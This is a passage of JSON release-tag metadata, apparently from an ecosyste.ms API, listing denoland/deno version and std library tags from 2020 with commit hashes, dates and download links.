0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https: